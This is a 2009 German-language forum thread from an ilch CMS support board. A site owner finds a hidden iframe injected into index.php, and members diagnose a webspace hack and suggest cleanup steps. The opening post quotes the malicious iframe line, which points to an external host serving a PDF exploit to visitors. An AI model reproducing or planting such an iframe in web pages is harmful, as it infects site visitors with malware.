ilch Forum » Ilch Clan 1.1 » Fehlersuche und Probleme » Plötzlicher PHP-Fehler mit iframe?

Geschlossen
  1. #1
    User Pic
    Ape12 Mitglied
    Registriert seit
    07.07.2009
    Beiträge
    25
    Beitragswertungen
    0 Beitragspunkte
    Hallo Leute,

    gestern Abend ging meine Seite noch. Wenn ich jetzt raufgehe steht da:
    Parse error: syntax error, unexpected $end in /users/schulle12/www/ilch/index.php on line 27


    In der index.php steht an der Stelle:
    <iframe src="http://u3w.ru:8080/index.php" width=165 height=165 style="visibility: hidden"></iframe>


    Das gehört ja nicht dahin. Erst nachdem ich die alte index.php aufgespielt hab, gings wieder.

    Aber wie kommt dieser böse unsichtbare iframe dahin?
    0 Mitglieder finden den Beitrag gut.
  2. #2
    User Pic
    Rock@wulf Hall Of Fame
    Registriert seit
    03.06.2004
    Beiträge
    3.282
    Beitragswertungen
    239 Beitragspunkte
    Was macht das in der PHP datei schreibs passend in die HTML datei dann sollte es gehen
    Meine Postings repräsentieren meine Meinung wenn nicht anders gekennzeichnet.
    MFG Rock@wulf
    0 Mitglieder finden den Beitrag gut.
  3. #3
    User Pic
    Ape12 Mitglied
    Registriert seit
    07.07.2009
    Beiträge
    25
    Beitragswertungen
    0 Beitragspunkte
    Nein Nein, ich hab das da nicht reingemacht. Was soll ich mit nem leeren iframe.

    Ich tippe auf nen Angriff von außen... Der iframe verweist ja auf "http://u3w.ru:8080/filez/readme.pdf" irgewndwas asiatisches, nach google...
    0 Mitglieder finden den Beitrag gut.
  4. #4
    User Pic
    Devil Mitglied
    Registriert seit
    02.02.2006
    Beiträge
    2.094
    Beitragswertungen
    21 Beitragspunkte
    Kann sein...
    Free Server Anbieter ändern auch z.b. ne index.htm Datei...wenn es nicht weiterhin passiert ist ja alles i.O. lachen
    Wer zuletzt lacht, hat den schlechtesten Ping.
    0 Mitglieder finden den Beitrag gut.
  5. #5
    User Pic
    annemarie gelöschter User
    webspace hack, werbung von freien hostern wir idr nicht über iframes in die userpages eingebunden sondern über DHTML overlay oder ähnliche techniken.

    änder am besten mal deine passwörter (webspace/db) auf ne sichere länge (8 zeichen zahlen/buchstaben)
    0 Mitglieder finden den Beitrag gut.
  6. #6
    User Pic
    Ape12 Mitglied
    Registriert seit
    07.07.2009
    Beiträge
    25
    Beitragswertungen
    0 Beitragspunkte
    Naja, ich habe echt sichere passwörter (mehr als 10 zeichen buchstaben und zahlen).

    Mir kommt es jedenfalls so vor, als ob die seite auch sehr langsam ist:

    Oder seh ich das falsch? Kann auch an meinem netz liegen lächeln

    Jedenfalls glaube ich, ich sollte mir ma anderen webspace suchen.
    Hat jemand nen billigen tipp?


    Zuletzt modifiziert von Ape12 am 10.07.2009 - 20:33:42
    0 Mitglieder finden den Beitrag gut.
  7. #7
    User Pic
    Jan Hall Of Fame
    Registriert seit
    17.01.2007
    Beiträge
    3.646
    Beitragswertungen
    54 Beitragspunkte
    Besucher deiner Seite laden sich automatisch einen Virus runter. grumml

    ZitatZitat geschrieben von G Data Antivirus 2009
    Virus: Exploit.PDF-JS.Gen (Engine A)

    Es wurde versucht, auf eine infizierte
    Datei zuzugreifen.

    Datei: readme.pdf
    Verzeichnis: C:\Dokumente und Einstellungen\Jan\Lokale Einstellungen\Temp


    Webspace:
    externer Link
    weblino.de/webspace/weblarge.html
    0 Mitglieder finden den Beitrag gut.
  8. #8
    User Pic
    Ape12 Mitglied
    Registriert seit
    07.07.2009
    Beiträge
    25
    Beitragswertungen
    0 Beitragspunkte
    Scheiße..... Und nun?
    0 Mitglieder finden den Beitrag gut.
  9. #9
    User Pic
    Schnitter Mitglied
    Registriert seit
    18.03.2005
    Beiträge
    139
    Beitragswertungen
    0 Beitragspunkte
    hmm du könntest das versuchen zu Reparieren,
    Ich hätte das so gemacht:
    • den Webspace lokal runterladen
    • Mit Notpad++ oder Proton nach den werten suchen (Dateiübergreifendes Suchen)
    • Dateinamen merken (für Einstieger) und durch die Original Ilch Dateien ersetzen oder auf dem Server.


    Solltest die Werte im Template finden (index.html) mußt die die von Hand abändern, gut ist bei Notpad++ daß er auch anzeigt in welche Zeile der gesuchte Schadcode ist.


    Zuletzt modifiziert von Schnitter am 19.07.2009 - 13:43:13
    Du Kunst des Marketing ist den Kunden so schnell über dem Tisch zu ziehen so das er die Reibungswärme als Nestwärme empfindet.
    0 Mitglieder finden den Beitrag gut.
  10. #10
    User Pic
    Ape12 Mitglied
    Registriert seit
    07.07.2009
    Beiträge
    25
    Beitragswertungen
    0 Beitragspunkte
    Ja, aber das problem ist, der blöde frame kommt immer wieder.
    Ich muss das dann jedesmal neu ändern, anstatt mich irgendwie davor zu schützen...
    0 Mitglieder finden den Beitrag gut.
Geschlossen

Zurück zu Fehlersuche und Probleme

Optionen: Bei einer Antwort zu diesem Thema eine eMail erhalten